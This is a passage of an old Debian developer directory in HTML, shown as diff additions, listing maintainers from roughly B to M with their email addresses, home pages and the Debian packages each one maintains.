HREF="mailto:michael@grisu.weh.rwth-aachen.de"><michael@grisu.weh.rwth-aachen.de></A> +<DD><STRONG>main:</STRONG> ts +<DD><STRONG>contrib:</STRONG> dfm, kvoice +<DT><STRONG>Erick Branderhorst </STRONG><A HREF="mailto:"><></A> +(<A HREF="http://www.iaehv.nl/users/branderh/">home page</A>) +<DD> +<DT><STRONG>Björn Brenander </STRONG><A HREF="mailto:bjorn@debian.org"><bjorn@debian.org></A> +(<A HREF="http://brenander.pp.se/bjorn/">home page</A>) +<DD><STRONG>main:</STRONG> catdoc, tcputils +<DT><STRONG>Adrian Bridgett </STRONG><A HREF="mailto:adrian.bridgett@poboxes.com"><adrian.bridgett@poboxes.com></A> +<DD><STRONG>main:</STRONG> cftp, gmemusage, lg-base, lg-issue01to08, lg-issue09, lg-issue10, lg-issue11, lg-issue12, lg-issue13, lg-issue14, lg-issue15, lg-issue16, lg-issue17, lg-issue18, lg-issue19, lg-issue20, lg-issue21, lg-issue22, lg-issue23, lg-issue24, lg-issue25, lg-issue26, lg-issue27, lg-issue28, mpage, newsx, nighthawk, tkdiff, tkfont, xnetload +<DD><STRONG>contrib:</STRONG> kpppload, pppload +<DD><STRONG>non-free:</STRONG> tgif +<DT><STRONG>Marcus Brinkmann </STRONG><A HREF="mailto:brinkmd@debian.org"><brinkmd@debian.org></A> +(<A HREF="http://homepage.ruhr-uni-bochum.de/Marcus.Brinkmann">home page</A>) +<DD><STRONG>main:</STRONG> libgtkmm, libgtkmm-dev, svncviewer, vncserver, xscavenger, xvncviewer +<DT><STRONG>Charles Briscoe-Smith </STRONG><A HREF="mailto:cpbs@debian.org"><cpbs@debian.org></A> +(<A HREF="http://alethea.ukc.ac.uk/wp?95cpb4">home page</A>) +<DD><STRONG>main:</STRONG> stow, wenglish +<DD><STRONG>non-free:</STRONG> frotz, gsn-curses, gsn-jigsaw, gumshoe, so-far, strn, tatctae, weather +<DT><STRONG>Rob Browning </STRONG><A HREF="mailto:rlb@cs.utexas.edu"><rlb@cs.utexas.edu></A> +<DD><STRONG>main:</STRONG> emacs20, emacs20-el, emacsen-common, plotutils, psutils +<DD><STRONG>non-free:</STRONG> scheme-to-c +<DT><STRONG>Martin Buck </STRONG><A HREF="mailto:mbuck@debian.org"><mbuck@debian.org></A> +<DD><STRONG>main:</STRONG> olvwm, olwm, xview, xview-altdev, xview-clients, xview-examples, xviewg, xviewg-dev +<DT><STRONG>Marco Budde </STRONG><A HREF="mailto:Budde@tu-harburg.de"><Budde@tu-harburg.de></A> +<DD><STRONG>main:</STRONG> dhelp, doc-linux-de, doc-linux-html, doc-linux-ja, doc-linux-text, doc-linux-zh, heise-register, selfhtml +<DD><STRONG>non-free:</STRONG> doc-html-w3, hwb +<DT><STRONG>Sue Campbell </STRONG><A HREF="mailto:sacampbe@mercator.math.uwaterloo.ca"><sacampbe@mercator.math.uwaterloo.ca></A> +<DD><STRONG>main:</STRONG> lapack, lapack-dev, lapack-doc +<DT><STRONG>Stephen J. Carpenter </STRONG><A HREF="mailto:sjc@debian.org"><sjc@debian.org></A> +<DD><STRONG>main:</STRONG> xfstt +<DT><STRONG>Petr Cech </STRONG><A HREF="mailto:cech@debian.org"><cech@debian.org></A> +<DD><STRONG>main:</STRONG> lde +<DD><STRONG>non-free:</STRONG> rar, zoo +<DT><STRONG>Ricardas Cepas </STRONG><A HREF="mailto:rch@debian.org"><rch@debian.org></A> +<DD><STRONG>main:</STRONG> 2utf +<DT><STRONG>Juan Cespedes </STRONG><A HREF="mailto:cespedes@debian.org"><cespedes@debian.org></A> +<DD><STRONG>main:</STRONG> libc6-pre2.1-doc, ltrace, syslinux, vlock +<DT><STRONG>Mike Coleman </STRONG><A HREF="mailto:"><></A> +(<A HREF="http://chez-gnu.cstp.umkc.edu/~coleman/ ">home page</A>) +<DD> +<DT><STRONG>Alistair Cunningham </STRONG><A HREF="mailto:ac212@cam.ac.uk"><ac212@cam.ac.uk></A> +<DD><STRONG>main:</STRONG> xchain +<DT><STRONG>Marco d'Itri </STRONG><A HREF="mailto:md@linux.it"><md@linux.it></A> +<DD><STRONG>main:</STRONG> binkd, ifcico-cm +<DT><STRONG>Larry Daffner </STRONG><A HREF="mailto:vizzie@airmail.net"><vizzie@airmail.net></A> +<DD><STRONG>main:</STRONG> xscreensaver, xscreensaver-gl +<DD><STRONG>non-free:</STRONG> giflib-bin, giflib3g, giflib3g-dev +<DT><STRONG>Kevin Dalley </STRONG><A HREF="mailto:kevind@rahul.net"><kevind@rahul.net></A> +<DD><STRONG>main:</STRONG> automake, findutils, sane +<DT><STRONG>Drake Diedrich </STRONG><A HREF="mailto:Drake.Diedrich@anu.edu.au"><Drake.Diedrich@anu.edu.au></A> +<DD><STRONG>main:</STRONG> dpkg-http, latex2rtf +<DD><STRONG>non-free:</STRONG> dqs +<DT><STRONG>Klee Dienes </STRONG><A HREF="mailto:klee@debian.org"><klee@debian.org></A> +<DD><STRONG>main:</STRONG> dpkg-ftp, ilu-base, ilu-dev, ilu-doc, ilu-elisp, ilu-examples, ilu-guiledev, ilu-javadev, python-wpy +<DD><STRONG>non-free:</STRONG> acroread +<DT><STRONG>Yann Dirson </STRONG><A HREF="mailto:dirson@debian.org"><dirson@debian.org></A> +<DD><STRONG>main:</STRONG> comerr-dev, console-tools, console-tools-data, console-tools-dev, console-tools-libs, e2fslibs-dev, e2fsprogs, fweb, kbd, kbd-compat, kbd-data, plan, ss-dev +<DD><STRONG>non-free:</STRONG> tkman +<DT><STRONG>Austin Donnelly </STRONG><A HREF="mailto:and1000@debian.org"><and1000@debian.org></A> +(<A HREF="http://www.cl.cam.ac.uk/users/and1000/ ">home page</A>) +<DD><STRONG>main:</STRONG> bsdmainutils, bsdutils, fvwm-common, fvwm2, xloadimage +<DT><STRONG>Michael Alan Dorman </STRONG><A HREF="mailto:mdorman@debian.org"><mdorman@debian.org></A> +<DD><STRONG>main:</STRONG> cgiemail, data-dumper, libnet-perl, libwww-perl, newscache, xqf, zlib1, zlib1-altdev, zlib1g, zlib1g-dev +<DT><STRONG>Tyson Dowd </STRONG><A HREF="mailto:trd@cs.mu.oz.au"><trd@cs.mu.oz.au></A> +<DD><STRONG>main:</STRONG> mercury, xacc +<DT><STRONG>Steve Dunham </STRONG><A HREF="mailto:dunham@debian.org"><dunham@debian.org></A> +<DD><STRONG>main:</STRONG> dhcpcd +<DT><STRONG>Bernd Eckenfels </STRONG><A HREF="mailto:ecki@debian.org"><ecki@debian.org></A> +<DD><STRONG>main:</STRONG> memstat +<DT><STRONG>Dirk Eddelbuettel </STRONG><A HREF="mailto:edd@debian.org"><edd@debian.org></A> +(<A HREF="http://rosebud.sps.queensu.ca/~edd ">home page</A>) +<DD><STRONG>main:</STRONG> a2ps, acct, afio, apmd, efax, libio-stringy-perl, libmime-perl, mirror, octave, octave-doc, octave-staticlibs, time, tob +<DD><STRONG>contrib:</STRONG> auto-pgp +<DD><STRONG>non-free:</STRONG> archie, mirror, xgobi, xpdf +<DT><STRONG>Robert S. Edmonds </STRONG><A HREF="mailto:edmonds@freewwweb.com"><edmonds@freewwweb.com></A> +<DD><STRONG>main:</STRONG> 3dchess, bwbasic, gedit, gtimer, iptraf, irquery, netcat, qftp, razzle, tcd, vgagamespack, yabasic +<DT><STRONG>Patrick J. Edwards </STRONG><A HREF="mailto:pje120@mail.usask.ca"><pje120@mail.usask.ca></A> +<DD><STRONG>non-us:</STRONG> cfs +<DT><STRONG>Mark W. Eichin </STRONG><A HREF="mailto:eichin@kitten.gen.ma.us"><eichin@kitten.gen.ma.us></A> +<DD><STRONG>main:</STRONG> emacs19, emacs19-el, gnat, xcontrib, docbook, mtools +<DT><STRONG>Scott K. Ellis </STRONG><A HREF="mailto:scott@debian.org"><scott@debian.org></A> +<DD><STRONG>main:</STRONG> diffstat, esound, faqomatic, imagemagick, libesd0, libesd0-dev, liblogfile-rotate-perl, libmagick4-dev, libmagick4g, mtr, perlmagick +<DD><STRONG>non-free:</STRONG> libmagick4-lzw-dev, libmagick4g-lzw +<DT><STRONG>Oliver Elphick </STRONG><A HREF="mailto:Oliver.Elphick@lfix.co.uk"><Oliver.Elphick@lfix.co.uk></A> +<DD><STRONG>main:</STRONG> bible-kjv, bible-kjv-text, ecpg, libpgperl, libpgsql, libpgtcl, postgresql, postgresql-dev, postgresql-doc, smalleiffel +<DD><STRONG>contrib:</STRONG> libpgjava, mozilla-dmotif, mozilla-smotif +<DT><STRONG>David Engel </STRONG><A HREF="mailto:david@debian.org"><david@debian.org></A> +<DD><STRONG>main:</STRONG> ldso, libdl1-altdev, libsnmp3.5, libsnmp3.5-dev, scotty, snmp, tcl8.0, tcl8.0-dev, tk8.0, tk8.0-dev +<DT><STRONG>Carey W. Evans </STRONG><A HREF="mailto:carey@debian.org"><carey@debian.org></A> +<DD><STRONG>non-free:</STRONG> x3270, x3270-htmldoc +<DT><STRONG>Peter Van Eynde </STRONG><A HREF="mailto:pvaneynd@debian.org"><pvaneynd@debian.org></A> +<DD><STRONG>main:</STRONG> cil, clio, clue, cmucl, cmucl-clm, cmucl-clx, cmucl-hemlock, pictures, series +<DD><STRONG>non-free:</STRONG> cmucl-defsystem +<DT><STRONG>Chris Fearnley </STRONG><A HREF="mailto:cjf@netaxs.com"><cjf@netaxs.com></A> +(<A HREF="http://www.netaxs.com/~cjf/ ">home page</A>) +<DD><STRONG>main:</STRONG> slang1, slang1-dev, slang1-pic +<DT><STRONG>Anthony Fok </STRONG><A HREF="mailto:foka@debian.org"><foka@debian.org></A> +<DD><STRONG>main:</STRONG> bzip2, fdutils, freetype-tools, freetype1, freetype1-dev, iselect, lilypond, xcin, xcin-doc +<DD><STRONG>contrib:</STRONG> m-tx, musixlyr, pmx +<DD><STRONG>non-free:</STRONG> gfont, musixtex, musixtex-doc, opustex, wwwtable +<DT><STRONG>Turbo Fredriksson </STRONG><A HREF="mailto:turbo@debian.org"><turbo@debian.org></A> +<DD><STRONG>contrib:</STRONG> tcpquota +<DT><STRONG>David Frey </STRONG><A HREF="mailto:dfrey@debian.org"><dfrey@debian.org></A> +<DD><STRONG>main:</STRONG> magicfilter, nosql, nosql-fastops, p3nfs, spell +<DT><STRONG>Bdale Garbee </STRONG><A HREF="mailto:bdale@gag.com"><bdale@gag.com></A> +(<A HREF="http://www.gag.com/~bdale/ ">home page</A>) +<DD><STRONG>main:</STRONG> amanda-client, amanda-common, amanda-server, bind, dds2tar, dnsutils, dump, gforth, gzip, makedev, nmap, sudo, tar, xntp3, xntp3-doc, yforth +<DT><STRONG>Guenter Geiger </STRONG><A HREF="mailto:geiger@iem.mhsg.ac.at"><geiger@iem.mhsg.ac.at></A> +<DD><STRONG>main:</STRONG> ivtools, ivtools-bin, ivtools-dev, pd +<DT><STRONG>Ben Gertzfield </STRONG><A HREF="mailto:che@debian.org"><che@debian.org></A> +<DD><STRONG>main:</STRONG> gimp, libgimp-dev, libgimp1, libgtk-dev, libgtk-doc, libgtk1, sirc +<DD><STRONG>non-free:</STRONG> gimp-nonfree, libforms-bin, libforms-dev, libforms-doc, libforms0.88 +<DT><STRONG>Helmut Geyer </STRONG><A HREF="mailto:Helmut.Geyer@iwr.uni-heidelberg.de"><Helmut.Geyer@iwr.uni-heidelberg.de></A> +<DD><STRONG>non-us:</STRONG> bzip +<DT><STRONG>John Goerzen </STRONG><A HREF="mailto:jgoerzen@complete.org"><jgoerzen@complete.org></A> +<DD><STRONG>main:</STRONG> cons, filerunner, imgvtopgm, lincity, lincity-svga, lincity-x, pnmtopng, wavtools, zircon +<DD><STRONG>contrib:</STRONG> kpilot +<DD><STRONG>non-free:</STRONG> gif2png +<DT><STRONG>Luis Francisco Gonzalez </STRONG><A HREF="mailto:luisgh@debian.org"><luisgh@debian.org></A> +<DD><STRONG>main:</STRONG> eeyes, tcsh, tcsh-i18n, urlview +<DD><STRONG>non-free:</STRONG> dmalloc +<DT><STRONG>Steve Greenland </STRONG><A HREF="mailto:stevegr@master.debian.org"><stevegr@master.debian.org></A> +<DD><STRONG>main:</STRONG> cron, nvi +<DT><STRONG>D.J. Gregor </STRONG><A HREF="mailto:"><></A> +(<A HREF="http://www.coil.com/~dgregor/ ">home page</A>) +<DD> +<DT><STRONG>Federico Di Gregorio </STRONG><A HREF="mailto:fog@debian.org"><fog@debian.org></A> +<DD><STRONG>main:</STRONG> dtm, nowebm, tkstep4.2, tkstep4.2-dev, tkstep8.0, tkstep8.0-dev, wwwoffle +<DT><STRONG>Igor Grobman </STRONG><A HREF="mailto:igor@debian.org"><igor@debian.org></A> +<DD><STRONG>main:</STRONG> svgatextmode +<DT><STRONG>Debian QA Group </STRONG><A HREF="mailto:debian-qa@lists.debian.org"><debian-qa@lists.debian.org></A> +<DD><STRONG>main:</STRONG> byacc, libregex0, libregex0-altdev, xbattle, xmailtool +<DT><STRONG>Geiger Guenter </STRONG><A HREF="mailto:geiger@iem.mhsg.ac.at"><geiger@iem.mhsg.ac.at></A> +<DD><STRONG>main:</STRONG> sox +<DT><STRONG>Stefan Gybas </STRONG><A HREF="mailto:sgybas@debian.org"><sgybas@debian.org></A> +<DD><STRONG>main:</STRONG> hsc +<DT><STRONG>Sami Haahtinen </STRONG><A HREF="mailto:ressu@rai.rauma.fi"><ressu@rai.rauma.fi></A> +<DD><STRONG>contrib:</STRONG> x11ampg +<DT><STRONG>Hugo Haas </STRONG><A HREF="mailto:hugo@debian.org"><hugo@debian.org></A> +<DD><STRONG>main:</STRONG> iplogger, ssmtp, xsysinfo +<DT><STRONG>Paul Haggart </STRONG><A HREF="mailto:phaggart@debian.org"><phaggart@debian.org></A> +(<A HREF="http://www.bsfh.org/">home page</A>) +<DD><STRONG>main:</STRONG> fetchmail, junkbuster +<DD><STRONG>non-free:</STRONG> mpg123, remind, tin +<DT><STRONG>Fredrik Hallenberg </STRONG><A HREF="mailto:hallon@debian.org"><hallon@debian.org></A> +<DD><STRONG>main:</STRONG> ascd, ascdc, asmail, asmixer, coolmail, xcolors, xdu +<DT><STRONG>Christian Hammers </STRONG><A HREF="mailto:ch@debian.org"><ch@debian.org></A> +<DD><STRONG>main:</STRONG> jed, jedsl, kdf, kfinger, rgrep +<DD><STRONG>contrib:</STRONG> kcmprinter, kdf, kfour, kgoodstuff, klyx, kmodplayer, kmpg, konquest, ksendfax, ksirc, ktelnet, ktron, kvidtune, kworldwatch, mkkdelnk +<DT><STRONG>Philip Hands </STRONG><A HREF="mailto:phil@hands.com"><phil@hands.com></A> +<DD><STRONG>main:</STRONG> mgetty, mgetty-docs, mgetty-fax, mgetty-viewfax, mgetty-voice, netdiag, ppp, ppp-pam, rsync +<DD><STRONG>non-free:</STRONG> qmail-src, ucspi-tcp-src +<DD><STRONG>non-us:</STRONG> ssh, ssh-askpass +<DT><STRONG>Scott Hanson </STRONG><A HREF="mailto:shanson@debian.org"><shanson@debian.org></A> +<DD><STRONG>non-free:</STRONG> mysql-base, mysql-bench, mysql-dev, mysql-doc, mysql-server +<DT><STRONG>Adam P. Harris </STRONG><A HREF="mailto:aph@debian.org"><aph@debian.org></A> +<DD><STRONG>main:</STRONG> addressbook, doc-base, jade, mh, mh-papers, sgml-data, sp, sp-dev +<DD><STRONG>contrib:</STRONG> sdc +<DT><STRONG>John Hasler </STRONG><A HREF="mailto:jhasler@debian.org"><jhasler@debian.org></A> +<DD><STRONG>main:</STRONG> pppconfig +<DT><STRONG>Galen Hazelwood </STRONG><A HREF="mailto:galenh@micron.net"><galenh@micron.net></A> +<DD><STRONG>main:</STRONG> altgcc, base-passwd, binutils, binutils-dev, cpp, egcc, egcs-docs, fileutils, g++, g++272, g77, gcc, gcc-docs, gobjc, info, libg++2.8, libg++2.8-dev, libstdc++2.8, libstdc++2.8-dev, ncurses-base, ncurses-bin, ncurses-term, ncurses3.0, ncurses3.0-altdev, ncurses3.4, ncurses3.4-dbg, ncurses3.4-dev, ncurses3.4-pic, vim +<DT><STRONG>Adam Heath </STRONG><A HREF="mailto:adam.heath@usa.net"><adam.heath@usa.net></A> +<DD><STRONG>main:</STRONG> defrag, omirr +<DD><STRONG>non-free:</STRONG> majordomo +<DT><STRONG>Karl M. Hegbloom </STRONG><A HREF="mailto:karlheg@debian.org"><karlheg@debian.org></A> +(<A HREF="http://www.inetarena.com/~karlheg/">home page</A>) +<DD><STRONG>main:</STRONG> browser-history, cvsweb, guile1.3, libguile3, libguile3-dev, libguile3-doc, procmail-lib, tguile1.3, tmpreaper +<DD><STRONG>non-free:</STRONG> gambc, guile-scsh, scsh +<DT><STRONG>Kai Henningsen </STRONG><A HREF="mailto:"><></A> +(<A HREF="http://www.westfalen.de/private/khms/ ">home page</A>) +<DD> +<DT><STRONG>Joey Hess </STRONG><A HREF="mailto:joeyh@master.debian.org"><joeyh@master.debian.org></A> +(<A HREF="http://kite.ml.org/~joey/ ">home page</A>) +<DD><STRONG>main:</STRONG> alien, analog, bsdgames, cxhextris, debhelper, dpkg-repack, filters, floatbg, gltt-bin, gltt1, gltt1-dev, gltt2, gltt2-dev, jhcore, lambdacore, lambdamoo, librpm1, librpm1-dev, megahal, moonlight, nextaw, nextawg, pdmenu, procmeter, rpm, slrn, slrnpull, toshiba-fan, xaw-wrappers, xbl, xboing, xgalaga, xjewel, xkobo, xonix-jahu, xtris +<DD><STRONG>contrib:</STRONG> mxmaps, rvplayer +<DD><STRONG>non-free:</STRONG> bsdgames-nonfree, distributed-net, doom, festival, gravitywars, mirrormagic, speech-tools-dev, xmap-dmotif, xmap-smotif, xtrojka +<DT><STRONG>Bob Hilliard </STRONG><A HREF="mailto:hilliard@debian.org"><hilliard@debian.org></A> +<DD><STRONG>main:</STRONG> dict, dict-easton, dict-elements, dict-foldoc, dict-gazetteer, dict-hitchcock, dict-jargon, dict-wn, dictd +<DT><STRONG>Roman Hodek </STRONG><A HREF="mailto:Roman.Hodek@informatik.uni-erlangen.de"><Roman.Hodek@informatik.uni-erlangen.de></A> +<DD><STRONG>main:</STRONG> amd, atari-fdisk-cross, dftp, dosfstools +<DT><STRONG>Gregor Hoffleit </STRONG><A HREF="mailto:flight@debian.org"><flight@debian.org></A> +<DD><STRONG>main:</STRONG> python-base, python-bsddb, python-curses, python-dev, python-doc, python-elisp, python-examples, python-extclass, python-gdbm, python-misc, python-mpz, python-net, python-regrtest, python-stdwin, python-tk, python-zlib +<DD><STRONG>contrib:</STRONG> gstep-base, gstep-base-dev, gstep-base-examples, gstep-extensions, gstep-extensions-dev, gstep-gui, gstep-gui-dev, gstep-make, gstep-xdps, gstep-xdps-dev, gstep-xdps-examples +<DT><STRONG>Dave Holland </STRONG><A HREF="mailto:"><></A> +(<A HREF="http://www.zenda.demon.co.uk/dave/">home page</A>) +<DD> +<DT><STRONG>Aaron Howell </STRONG><A HREF="mailto:aaron@sunrise.bayside.net.au"><aaron@sunrise.bayside.net.au></A> +<DD><STRONG>main:</STRONG> tama +<DT><STRONG>Christian Hudon </STRONG><A HREF="mailto:chrish@debian.org"><chrish@debian.org></A> +<DD><STRONG>main:</STRONG> lynx +<DT><STRONG>Johnie Ingram </STRONG><A HREF="mailto:johnie@debian.org"><johnie@debian.org></A> +<DD><STRONG>main:</STRONG> apache, apache-dev, apache-doc, bind-doc, bitchx, cfengine, cgi-scripts, eggdrop, fda, html2ps, ircd, karpski, proftpd, quickplot, stopafter, watchdog, webmagick +<DD><STRONG>non-free:</STRONG> libtsp2, libtsp2-dev +<DT><STRONG>Ian Jackson </STRONG><A HREF="mailto:"><></A> +(<A HREF="http://www.chiark.greenend.org.uk/~ijackson/ ">home page</A>) +<DD> +<DT><STRONG>Klee Dienes and Ian Jackson </STRONG><A HREF="mailto:dpkg-maint@chiark.greenend.org.uk"><dpkg-maint@chiark.greenend.org.uk></A> +<DD><STRONG>main:</STRONG> dpkg, dpkg-dev +<DT><STRONG>Ulf Jaenicke-Roessler </STRONG><A HREF="mailto:ujr@debian.org"><ujr@debian.org></A> +<DD><STRONG>main:</STRONG> libsidplay1, libsidplay1-dev, libsidplay1.36, libsidplay1.36-dev, sidplay +<DD><STRONG>contrib:</STRONG> xsidplay +<DT><STRONG>Andreas Jellinghaus </STRONG><A HREF="mailto:"><></A> +(<A HREF="http://home.pages.de/~tolonuga/ ">home page</A>) +<DD> +<DT><STRONG>Frank Jordan </STRONG><A HREF="mailto:f.jordan@uni-duisburg.de"><f.jordan@uni-duisburg.de></A> +<DD><STRONG>non-free:</STRONG> rsynth, xephem +<DT><STRONG>Richard Kaszeta </STRONG><A HREF="mailto:"><></A> +(<A HREF="http://www.menet.umn.edu/~kaszeta ">home page</A>) +<DD> +<DT><STRONG>Richard Kettlewell </STRONG><A HREF="mailto:richard@elmail.co.uk"><richard@elmail.co.uk></A> +(<A HREF="http://www.elmail.co.uk/staff/richard/ ">home page</A>) +<DD> +<DT><STRONG>Joel Klecker </STRONG><A HREF="mailto:jk@espy.org"><jk@espy.org></A> +<DD><STRONG>main:</STRONG> knl, libatalk-dev, libatalk1, libatalk1-dev, netatalk +<DT><STRONG>Adam Klein </STRONG><A HREF="mailto:aklein@debian.org"><aklein@debian.org></A> +<DD><STRONG>main:</STRONG> lpr, suidmanager +<DT><STRONG>Susan G. Kleinmann </STRONG><A HREF="mailto:sgk@debian.org"><sgk@debian.org></A> +<DD><STRONG>main:</STRONG> perlsgml +<DT><STRONG>Matthias Klose </STRONG><A HREF="mailto:doko@debian.org"><doko@debian.org></A> +<DD><STRONG>main:</STRONG> blt8.0-unoff, blt8.0-unoff-dev, hyperlatex, python-gdk-imlib, python-gtk, python-netcdf, python-numeric +<DT><STRONG>Thomas Koenig </STRONG><A HREF="mailto:ig25@rz.uni-karlsruhe.de"><ig25@rz.uni-karlsruhe.de></A> +<DD><STRONG>main:</STRONG> at +<DT><STRONG>Jay Kominek </STRONG><A HREF="mailto:jkominek@debian.org"><jkominek@debian.org></A> +<DD><STRONG>main:</STRONG> aub, crashme, hp48cc, jail, w3mir +<DD><STRONG>non-free:</STRONG> xwrits +<DT><STRONG>Hartmut Koptein </STRONG><A HREF="mailto:koptein@et-inf.fho-emden.de"><koptein@et-inf.fho-emden.de></A> +<DD><STRONG>main:</STRONG> enscript, pcb, xdigger +<DT><STRONG>Steve Kostecke </STRONG><A HREF="mailto:steve@debian.org"><steve@debian.org></A> +<DD><STRONG>main:</STRONG> linuxlogo +<DT><STRONG>Stephan Kulow </STRONG><A HREF="mailto:coolo@kde.org"><coolo@kde.org></A> +<DD><STRONG>contrib:</STRONG> kdebase, kdegames, kdegraphics, kdelibs0g, kdelibs0g-dev, kdemultimedia, kdenetwork, kdeutils +<DD><STRONG>non-free:</STRONG> kdesupport0g, kdesupport0g-dev +<DT><STRONG>Rafael Laboissiere </STRONG><A HREF="mailto:rafael@icp.inpg.fr"><rafael@icp.inpg.fr></A> +<DD><STRONG>main:</STRONG> bibindex +<DD><STRONG>non-free:</STRONG> iportuguese +<DT><STRONG>Stuart Lamble </STRONG><A HREF="mailto:"><></A> +(<A HREF="http://www.monash.edu.au/~lamble/ ">home page</A>) +<DD> +<DT><STRONG>Christoph Lameter </STRONG><A HREF="mailto:clameter@debian.org"><clameter@debian.org></A> +<DD><STRONG>main:</STRONG> le +<DT><STRONG>Soenke Lange </STRONG><A HREF="mailto:soenke@escher.north.de"><soenke@escher.north.de></A> +<DD><STRONG>main:</STRONG> smail +<DT><STRONG>John Lapeyre </STRONG><A HREF="mailto:lapeyre@physics.arizona.edu"><lapeyre@physics.arizona.edu></A> +<DD><STRONG>main:</STRONG> pdl, saml +<DD><STRONG>contrib:</STRONG> pgperl +<DT><STRONG>Tom Lear </STRONG><A HREF="mailto:tom@trap.mountain-view.ca.us"><tom@trap.mountain-view.ca.us></A> +<DD><STRONG>main:</STRONG> apple2 +<DD><STRONG>non-free:</STRONG> astrolog +<DT><STRONG>Eric Leblanc </STRONG><A HREF="mailto:jughead@debian.org"><jughead@debian.org></A> +<DD><STRONG>main:</STRONG> glbiff +<DD><STRONG>non-free:</STRONG> mp3.8hz, zangband +<DT><STRONG>Tom Lees </STRONG><A HREF="mailto:tom@lpsg.demon.co.uk"><tom@lpsg.demon.co.uk></A> +(<A HREF="http://www.lpsg.demon.co.uk/">home page</A>) +<DD><STRONG>main:</STRONG> awe-drv, awe-midi, awe-netscape, cvs, cvs-pcl, elib, libawe0.4, libawe0.4-dev, vkeybd +<DT><STRONG>David van Leeuwen </STRONG><A HREF="mailto:david@ElseWare.cistron.nl"><david@ElseWare.cistron.nl></A> +<DD><STRONG>main:</STRONG> vold +<DT><STRONG>Jean Pierre LeJacq </STRONG><A HREF="mailto:jplejacq@quoininc.com"><jplejacq@quoininc.com></A> +<DD><STRONG>main:</STRONG> cracklib-runtime, cracklib2, cracklib2-dev, linbot, printop, wn +<DT><STRONG>Frederic Lepied </STRONG><A HREF="mailto:Lepied@debian.org"><Lepied@debian.org></A> +<DD><STRONG>main:</STRONG> bbdb, fmirror, gsumi, isapnptools, python-pmw, xmbdfed +<DT><STRONG>Robert Leslie </STRONG><A HREF="mailto:"><></A> +(<A HREF="http://www.mars.org/home/rob/ ">home page</A>) +<DD> +<DT><STRONG>Christian Leutloff </STRONG><A HREF="mailto:leutloff@debian.org"><leutloff@debian.org></A> +(<A HREF="http://www.oche.de/~leutloff/">home page</A>) +<DD><STRONG>main:</STRONG> jadetex +<DT><STRONG>James LewisMoss </STRONG><A HREF="mailto:dres@dimensional.com"><dres@dimensional.com></A> +<DD><STRONG>main:</STRONG> offix-editor, offix-files, offix-trash, xemacs20-bin, xemacs20-mule, xemacs20-mule-canna-wnn, xemacs20-nomule, xemacs20-support, xemacs20-supportel +<DT><STRONG>Nicolás Lichtmaier </STRONG><A HREF="mailto:nick@feedback.net.ar"><nick@feedback.net.ar></A> +<DD><STRONG>main:</STRONG> bug, file, lftp, man2html, manpages, manpages-dev, manpages-es, wget +<DD><STRONG>non-free:</STRONG> btoa +<DT><STRONG>Emilio C. Lopes </STRONG><A HREF="mailto:ecl@debian.org"><ecl@debian.org></A> +<DD><STRONG>main:</STRONG> ftnchek +<DT><STRONG>Will Lowe </STRONG><A HREF="mailto:lowe@debian.org"><lowe@debian.org></A> +(<A HREF="http://www.cis.udel.edu/~lowe/">home page</A>) +<DD><STRONG>main:</STRONG> rosegarden +<DT><STRONG>Roberto Lumbreras </STRONG><A HREF="mailto:rover@debian.org"><rover@debian.org></A> +<DD><STRONG>main:</STRONG> eql, pptp-linux +<DD><STRONG>non-free:</STRONG> ezmlm-src, serialmail-src +<DT><STRONG>Eduardo Marcel Macan </STRONG><A HREF="mailto:"><></A> +(<A HREF="http://www.dcc.unicamp.br/~macan">home page</A>) +<DD> +<DT><STRONG>Kenneth MacDonald </STRONG><A HREF="mailto:K.MacDonald@ed.ac.uk"><K.MacDonald@ed.ac.uk></A> +(<A HREF="http://www.glg.ed.ac.uk/~kenny ">home page</A>) +<DD><STRONG>main:</STRONG> iamerican, ibritish, ispell +<DT><STRONG>Gergely Madarasz </STRONG><A HREF="mailto:gorgo@caesar.elte.hu"><gorgo@caesar.elte.hu></A> +<DD><STRONG>main:</STRONG> icewm, php3, php3-dev, php3-doc, php3-pgsql +<DD><STRONG>contrib:</STRONG> php3-gd, php3-msql, php3-mysql +<DD><STRONG>non-free:</STRONG> dbf, hugs, hugs-doc, php3-dbase +<DT><STRONG>Keita Maehara </STRONG><A HREF="mailto:maehara@debian.org"><maehara@debian.org></A> +<DD><STRONG>main:</STRONG> cwnn, cwnn-dev, kwnn, kwnn-dev, manpages-ja, wnn, wnn-common, wnn-dev, xwnmo +<DT><STRONG>Marcelo E. Magallon </STRONG><A HREF="mailto:mmagallo@debian.org"><mmagallo@debian.org></A> +<DD><STRONG>main:</STRONG> asclock, libproplist0, libproplist0-dev, login.app, mixer.app, wmaker-data, wmavgload, wmcdplay, wmload, wmmail, wmmixer, wmmount, wmppp.app, wmrack +<DD><STRONG>non-free:</STRONG> wmcdplay, wmmount +<DT><STRONG>Camm Maguire </STRONG><A HREF="mailto:cmaguire@enhanced.com"><cmaguire@enhanced.com></A> +<DD><STRONG>main:</STRONG> cxref +<DT><STRONG>Tony Mancill </STRONG><A HREF="mailto:tmancill@debian.org"><tmancill@debian.org></A> +<DD><STRONG>main:</STRONG> wanpipe +<DT><STRONG>Guy Maor </STRONG><A HREF="mailto:maor@debian.org"><maor@debian.org></A> +<DD><STRONG>main:</STRONG> bash, bash-builtins, debianutils, libreadline2, libreadline2-altdev, libreadlineg2, libreadlineg2-dbg, libreadlineg2-dev, login, passwd, secure-su +<DT><STRONG>Damjan Marion </STRONG><A HREF="mailto:dmarion@debian.org"><dmarion@debian.org></A> +<DD><STRONG>main:</STRONG> ntfs2.0.33 +<DD><STRONG>non-free:</STRONG> sniffit, xzx +<DT><STRONG>Christoph Martin </STRONG><A HREF="mailto:christoph.martin@uni-mainz.de"><christoph.martin@uni-mainz.de></A> +<DD><STRONG>main:</STRONG> libsocks4, socks4-clients, socks4-server, tetex-base, tetex-bin, tetex-dev, tetex-doc, tetex-extra, tetex-src, xlbiff +<DD><STRONG>non-free:</STRONG> tetex-nonfree +<DD><STRONG>non-us:</STRONG> apache-common, apache-ssl, crypt++el, libssl08, libssl08-dev, ssleay, ssltelnet +<DT><STRONG>Dale E. Martin </STRONG><A HREF="mailto:dmartin@debian.org"><dmartin@debian.org></A> +<DD><STRONG>main:</STRONG> cdparanoia +<DT><STRONG>Daniel Martin </STRONG><A HREF="mailto:fizbin@debian.org"><fizbin@debian.org></A> +<DD><STRONG>main:</STRONG> fvwm95, tkdesk +<DT><STRONG>Lalo Martins </STRONG><A HREF="mailto:lalo@webcom.com"><lalo@webcom.com></A> +<DD><STRONG>main:</STRONG> freeciv +<DD><STRONG>contrib:</STRONG> icq-java 